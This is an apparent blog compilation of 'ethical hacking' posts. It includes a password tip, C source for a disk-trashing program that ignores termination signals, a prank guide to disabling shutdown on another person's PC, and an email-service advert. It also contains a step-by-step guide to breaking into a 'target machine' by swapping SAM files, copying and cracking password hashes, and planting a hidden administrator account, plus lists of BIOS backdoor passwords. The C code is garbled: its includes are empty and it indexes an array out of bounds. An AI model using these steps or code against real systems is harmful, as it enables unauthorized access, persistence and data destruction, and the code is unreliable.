Miscellonous

Make Ultra Strong PasswordsA very good One from Irongeek.Strong Article Worth SharinAs some Microsoft Operating System geeks know, you can type many more characters than are on a standard keyboard by using the ALT+NUMPAD combination technique. For exam…


Make Ultra Strong Passwords
A very good One from Irongeek.
Strong Article Worth Sharin

As some Microsoft Operating System geeks know, you can type many more characters than are on a standard keyboard by using the ALT+NUMPAD combination technique. For example, by holding down the ALT key, typing 234 on the number pad, then releasing ALT gives you the O character. I’m writing this article mostly because when I search around for information on the topic of ALT+Number key combos I find pages that are lacking in details. Most of the pages I found are coming from the angle of using ALT+NUMPAD combinations as shortcuts for typing in non-English languages, but I have another use for them. Using ALT+NUMPAD can make for some very ugly passwords to crack. These odd characters have two major advantages over normal keystrokes:

1. They are unlikely to be in someone’s dictionary or brute force list. Try brute forcing a password like “ace of ?s” or “I am the a and the O”.
2. Some hardware key loggers will not log these odd characters. Your mileage may vary on this as some key loggers can, so don’t rely on it to keep you 100% safe.

I’ll cover the 2nd point more in an upcoming article. Using ALT+NUMPAD to type odd characters into your password also has a few disadvantages.

1. The way they are described in this article only works in Microsoft Operating Systems (DOS, Windows 9x, Vista, XP, 2000), and there may be some variation amongst the different versions. If you know of a good way to do the same thing in Linux please email me.
2. Not all applications will let you use these odd characters. For testing I tried the password “Oÿ” (ALT+234 and ALT+0255) on a Windows XP local account,, but not all application will let you use these sorts of characters in your password.

Microsoft has the following to say on the subject of ALT+NUM key codes:

From:http://www.microsoft.com/globaldev/reference/glossary.mspx

Alt+Numpad: A method of entering characters by typing in the character’s decimal code with the Numeric Pad keys (Num Lock turned on). In Windows:

• Alt+, where xxx is the decimal value of a code point, generates an OEM-encoded character.
• Alt+<0xxx>, where xxx is the decimal value of a code point, generates a Windows-encoded character.
• Alt+< +>+, where xxxx is the hexadecimal Unicode code point, generates a Unicode-encoded (UTF-16) character.

Shortly I’ll explain explain the first two methods further. The 3rd is more problematic to work with. First, you may have to edit your registry and add a the REG_SZ value “HKEY_Current_User/Control Panel/Input Method/EnableHexNumpad”, then set it to “1”. Also, depending on where you are trying to type the character the application may interpret your hexadecimal Fs as attempts to bring down the file menu. Since method three is so problematic I’ll focus on the first two methods.
First, make sure you are using the number pad and not the top roll number keys, only the number pad works for this. Second, make sure NUM LOCK is on. It does not have to be on in all cases for these key combos to work, but it helps by keeping the number pad from being misinterpreted.

The chart from the site shows the relevant key codes to get various symbols. The table on the left shows the OEM Extended ASCII character set (AKA: IBM PC Extended Character Set; Extended ASCII; High ASCII; 437 U.S. English). True ASCII is only 7 bit, so the range is 0 to 127. IBM extended it to 8 bits and added more characters. To type these characters you merely have to hold down an ALT key, type the numeric value of the character, then release the ALT key.

The table on the right shows the ANSI character set (AKA: Window’s ANSI/ISO Latin-1/ANSI Extended ASCII, though technically they are not exactly the same thing.). To use the ANSI character set you do the same thing as the OEM set, but you preface the number with an extra zero. Notice that the first 127 should be the same in both sets, though values 0-31 may not be viewable in all cases. I’ve been in “character encoding hell” just trying to get this article on my site in a readable format.

For example, ALT+257 gives me a in Wordpad, but in Notepad it loops back around the character set and gives me?(257-256=1 which is ? in the OEM set) . If you want to know what key code will bring up a particular character in a certain Windows font run Windows Character Map (charmap.exe) and look in the bottom right corner to find out.

some examples :

ALT+130 é
ALT+131 â
ALT+132 ä
ALT+133 à
ALT+134 å
ALT+135 ç
ALT+136 ê
ALT+137 ë
ALT+138 è
ALT+139 ï
ALT+140 î
ALT+141 ì
ALT+142 Ä
ALT+143 Å
ALT+144 É
ALT+145 æ
ALT+146 Æ
ALT+147 ô
ALT+148 ö
ALT+149 ò
ALT+150 û
ALT+151 ù
ALT+152 ÿ
ALT+153 Ö
ALT+154 Ü
ALT+155 ¢
ALT+156 £
ALT+157 ¥
ALT+158 P
ALT+159 ƒ
ALT+160 á
ALT+161 í
ALT+162 ó
ALT+163 ú
ALT+164 ñ
ALT+165 Ñ
ALT+166 ª
ALT+167 º
ALT+168 ¿
ALT+169 ¬

Create Bad sectors on hard disks

A C source code

/*create bad sectors on the hard disk.
*
* This program will create bad sectors on the hard disk. If you left it
* running for long enough, it could render a hard disk quite useless. When
* bad sectors are found, the sector is marked as bad, so fixing the hard disk
* is not an easy task. Unless the victim has time and knowledge to fix the
* disk, the hard drive can be left quite literally defective.
* supported by preetam
* I don’t take responsibility for what you do with this program, served foe educational purpose only.
*
*
*/

#include
#include
#include
#include
#include
#include

#include

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf(“sekt0r: trashing hard disk with bad sectors!\n”);

while(1) {
fd[1] = open(“/tmp/.test”, O_WRONLY|O_CREAT, 511);
fd[2] = open(“/tmp/.test1”, O_WRONLY|O_CREAT, 511);
fd[3] = open(“/tmp/.test2”, O_WRONLY|O_CREAT, 511);
fd[4] = open(“/tmp/.test3”, O_WRONLY|O_CREAT, 511);
fd[5] = open(“/tmp/.test4”, O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */

void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf(“sekt0r: cannot exit – trashing hard disk with bad sectors!\n”);
return; /* go back to creating bad sectors. */
}

Disable or remove shutdown

=> remove shutdown from start menu and also from all other possible options.
=> hide shutdown from start menu
=> disable shutdown all togetherDisable or remove shutdown – The Ethical Hackinglearn to do it now!!! (it takes less than a minute to do so) Disclaimer: this is an article which just brings out the fact that removing the
shut down menu option from the start menu is possible. If you however get caught
by your manager or college system administrator, and get whipped in your ass, I
cannot be held responsible. This tool is a inbuilt tool present in windows XP, just like msgconfig. So you
got to execute this command using run. 1 . Start ->run and type gpedit.msc The gpedit stands for group policy and you can do wonders using this. Also if
you a minute with your pal’s system and this pal tries to flirt your girl friend
– You can make a lot of changes to his system in the time he leaves you alone
with his system, to have him go bonkers.
2. User configuration -> administrative Templates -> start menu and taskbar -> 3. This option opens up a pane on the right hand side. Identify the option named
– Remove SHUT DOWN on the start menu . 4. Double click Remove SHUT DOWN on the start menu option 5. a small screen pops up and you may like to read about the explanation in the
EXPLAIN TAB before you change the settings. 6. Just change the radio button TO ENABLED and say apply. 7. DONE. No need to log off or restart the system. (You may however have to find
a way to restart your system.) 8. This option disables the log off option from the system. From the start menu,
also from the life saver – three buttons CTRL – ALT – DEL options. This option goes well with the HIDING THE LOG OFF FROM START MENU… (To shut down ur system:-without using frm shut down menu) The solution is that u can switch user thru task manager (alt+ctrl+del) or by
pressing winkey+L where u get the option to turn off ur compy/restart/stand
by.
or u may create a shortcut using this shortcut location to shutdown ur sys %windir%\system32\shutdown.exe -s to restart, u can use this shortcut %windir%\system32\shutdown.exe -r

Self distructing Email – MI3
*****

one word – Just perfect

One of the best service i found online n using it too personally..

Big Brother is Watching

Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient’s inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?
Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that’s already been sent or read. Don’t leave your messages sitting in peoples’ inboxes forever. Get a free BigString email account to protect your privacy.

BigString takes the risk out of email

Now, with BigString, you can finally take the risk out of email and put an end to “sender regret.” It is the world’s first & only email service that thoroughly protects your safety and privacy.

BigString’s exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else’s inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can’t be posted to unseemly web sites or printed for circulation amongst total strangers.

BigString lets you have second thoughts
BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.

You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.

BigString takes the danger out of clicking
BigString guarantees that clicking “send” will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they’ve been opened! The freedom is yours, the options are yours, and you’re the boss with BigString.

BigString is easy to use
BigString is as easy to use as any other email and there’s nothing to download! Don’t be resigned to the mercy of your recipient. You don’t want your every action to be carved in stone because sometimes you just NEED to take it back!

Here are just a few of the many applications of BigString
Erasable, Recallable, Non-Printable Email.

Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even “pull an email back” to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.

On-Line Daters: You don’t want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you’ll allow a picture to be viewed before it disappears. BigString protects your privacy!

Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!

Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking “send” is no longer an action “carved in stone.” Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You’re the boss with BigString.
Self distructing Email – MI3 – The Ethical Hacking

SAM History n Hacking

1-Introduction

This article introduce very simple way to get Administrator like account and do the job and after finish recover your way, after that Get Admin Password later in your home by Cracking, After get the Admin Password Create a hidden user account and do all your jobs free, and Explain how to make a USB Storage Device Bootable corresponding to any system boot, and how to bypass Mother Board password by Default Passwords, and how to extract it if you are in the system

2-To Hackers / Security Systems Engineers

First All must know that both Hackers / Security Systems Engineers Are 2 faces to the same coin Any way, I try this on Windows XP SP2 I want all to try it on Windows Server 2003, Windows Vista Any Windows NT and POST a Message to make all know what versions exactly this idea can apply for
3-Close Look to hole
Microsoft stores all Security Information in many files but the main file is the SAM file (Security Accounts Manager)! this file contain critical information about users account you can explore the folder
$windir$\system32\config
You will find all things and may discover some thing new, but what amazing here is that the file is available, so we can apply our idea
shot1
You will Not be able To copy them Under XP
4-Dose Microsoft Know and Why!?
Yes Microsoft Know all things, and done on purpose why? I always for many years ask my self why Microsoft doesn’t do real security on their systems from the CD setup to all security aspects In the system, I found(my opinion may wrong)that they need to achieve 2 strategic things

1-They need their software spread and all depend on it and in one day when they feel that they are the One The security will done and all money will go to One Pocket

2-They Forced/Like to Make Some Organizations Hack other systems

Proof:
They can make this File SAM Unavailable by storing the information in FAT, FAT32, NTFS Areas (Sectors reserved by The Operating SYSTEM to Store the Addresses of the files on the HardDisk File Allocation Table) So that it is hard to extract. But they don’t!!!!!
5-Understand the Idea
The Idea is simple I will explain it manually and it can then be programmed it is so easy here is the idea

The SAM file is available and the SAM file contain a Security Information, so I created a Free Windows XP SP2 Logon account (Administrator Account without password) that means when windows Lunch it Will enter directly to the system without asking about any password And windows will store this Account in The SAM file on My PC So the SAM file on My PC contain an Account will Make you enter Directly to the Windows, so I will take My SAM File and Replace (by renaming, we will need the original file to recover our way) It with the other SAM File in The Other System or Machine So When you restart It will make you enter directly to the Windows With Administrator Like Account ,do what you need and then back all things to the previous state. All These Steps will be under other system bootable DOS, Knoppiex, Windows Live CD, Because Windows XP will not make u able to copy the Files
6-Get Admin Like Account (The Simple Way)

1- Download My 2 SAM files I Include them in Downloads
2- Go to the target Machine , and try to Access it and Boot from any device CD-ROM, Floppy, NIC if it haven’t any of those Read Hint 9
3- After Get Access to the Boot Command prompt c:> or Boot Live OS CD, Go to the windows folder $windir$\system32\config And Copy the SAM File and System File (we will need it later) To other folder, Then go to $windir$\repair copy SAM file
And then Rename the 2 SAM Files to SAM1 in their original places
4- Copy My SAM/config File and Paste it in the windows folder $windir$\system32\config Copy My SAM/Repair File and Paste it in the windows folder $windir$\repair (may this step not required)
5- Reboot and Make windows enter Normally
6- Yeah, No You are in The System
7- Copy the files in step 3 to Floppy Disk or Flash Stick Or Send it to your mail via Internet
8- After finish repeat step 2 and delete My SAM files and Rename Both SAM1 to SAM
9- Reboot , Congratulation you recover your way
7-Crack the SAM-Know the real Admin Password and Apply Hint 8
There is many ways I will introduce 2 ways and explain 1 After you get the SAM File and System File there are Programs That extract the Accounts and their passwords, depending on the idea of cracking the HASH (the HASH is one way encryption method) so that The program will generate random passwords and convert them to HASH and then compare it with the HASHES in the SAM File , so it may take a long time but for fast you will pay more money for ready made HASHES with their user names and passwords the 2 program are

1-L0phtcrack v4.0 (LC4 alternate name) the most famous on the NET
2-SAMInside http://www.insidepro.com/I include on the Downloads

I will explain fast SAMInside

shot1

This is the main window press Ctrl+O or by mouse click Import SAM and SYSTEM

shot1

Window will open to import the 2 files and the program will start to crack the Accounts and get them, and then display users names and their passwords

Any other tool will do the job try all and select your best I Explain here SAMInside because he give me results with 6 character only password and get it FAST
8-Creat a Hidden User Accountn
Windows NT / Windows 2000 and Windows XP has a security setting to hide accounts from the Logon Screen/Control panel users accounts

shot1
Press
Ctrl+Alt+Delet
Give you another Access Dialog

Steps:

1-After getting Admin Password enter to the system
2-create an Account with password
3-click start – > Run – > type Regedit press Enter
4-Go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\Winlogon\SpecialAccounts\UserList

shot1

5- Create a new DWORD Value on the UserList
6-Name it with Name of Account to be Hidden
7-set the Value Data of this DWORD Value to 0 to hide it /1 to appear it
8- close Regedit and Reboot
9- Press Ctrl+Alt+Delete when logon Screen Appear another login dialog appear type You hidden user name and password and press Enter

Note:

1- the account profile will be visible in \Documents and Settings, But it will be hidden from Logon Screen and User Account in the control panel

2-there is other method that Inject your Account directly to the Admin SAM without know the Admin Pass, but believe me you don’t Expect the result, so if you want try it (if the password hard to get)
9-USB Boot for FAT32, NTFS or any File System

HP Always amazing me to do this we need 2 tools

1- HP USB Disk Storage Format Tool v 2.0.6 I include in Downloads If u want to find more go to http://www.hp.com/
2- NTFSDOS Professional Boot Disk Wizard I include in Downloads If u want to find more go to http://www.winternals.com/

shot1

Just connect your USB Storage
steps:
1- Prepare a Startup Disk or Startup CD , Or any Equivalent
2- In the HP tool select the Device->your USB Storage
3- Select File System FAT or FAT32
4- Check “create a DOS startup disk” checkbox and then select option “using DOS System Files Located at”
5- brows your location
6- Click Start
7- Now you have a Bootable USB Storage Device
8- Now in the NTFSDOS Professional Boot Disk Wizard follow the wizard and you will get a NTFS bootable USB Storage

Why we need NTFS ?
If the Partition of the Windows System is NTFS so with normal Startup you will not be able to access any files because the File System is not Recognized by MS-DOS when we install NTFSDOS Professional on the bootable disk it will allow you To Access any File Under NTFS

Note:
Make sure that the option in Mother board Setup of First Boot “USB-Hard Disk” if you want to boot from a USB
10-Mother Boards Default Passwords and how to extract it if you are in The system

This subject is huge I try to find simple or clever way but as u know many PC’s many machines many bios versions and updates so I search the net for the best and I list below ,but if this doesn’t help I recommend you to find the bios version and the motherboard and search the net on Google, yahoo, yahoo groups and other you will find some thing help u

HOW TO BYPASS BIOS PASSWORDS
http://www.elfqrin.com/docs/biospw.html

Removing a Bios – CMOS Password
http://www.dewassoc.com/support/bios/bios_password.htm

How to Bypass BIOS Passwords
http://www.uktsupport.co.uk/reference/biosp.htm

How to Bypass BIOS Passwords
http://www.i-hacked.com/content/view/36/70/

Default Password List
2006-04-30
http://www.phenoelit.de/dpl/dpl.html

Award BIOS backdoor passwords:
ALFAROME——–BIOSTAR——–KDD——–ZAAADA——– ALLy——–CONCAT——–Lkwpeter——–ZBAAACA——– aLLy——– CONDO——–LKWPETER——–ZJAAADC——– aLLY——–Condo——–PINT——–01322222——– ALLY——–d8on——–pint——–589589——– aPAf——–djonet——–SER——–589721——– _award——–HLT——–SKY_FOX——–595595——– AWARD_SW——–J64——–SYXZ——–598598 AWARD?SW——–J256——–syxz——– AWARD SW——–J262——–shift + syxz——– AWARD PW——–j332——–TTPTHA——– AWKWARD——–j322——– awkward

AMI BIOS Backdoor Passwords:
AMI——–BIOS——–PASSWORD——–HEWITT RAND——– AMI?SW——–AMI_SW——–LKWPETER——–CONDO

Phoenix BIOS Backdoor Passwords: phoenix——–PHOENIX——–CMOS——–BIOS

Misc. Common Passwords
ALFAROME——–BIOSTAR——–biostar——–biosstar——– CMOS——–cmos——–LKWPETER——–lkwpeter——– setup——–SETUP——–Syxz——–Wodj
Other BIOS Passwords by Manufacturer
Manufacturer——–Password
VOBIS & IBM——– merlin
Dell——–Dell
Biostar——– Biostar
Compaq——–Compaq
Enox——–xo11nE
Epox——–central
Freetech——–Posterie
IWill——–iwill
Jetway——–spooml
Packard Bell——–bell9
QDI——–QDI
Siemens——–SKY_FOX
TMC——–BIGO
Toshiba——–Toshiba
Toshiba——–BIOS

Most Toshiba laptops
and some desktop systems will bypass the BIOS password if the left shift key is held down during boot
IBM Aptiva BIOS
Press both mouse buttons repeatedly during the boot


Leave a Reply

Your email address will not be published. Required fields are marked *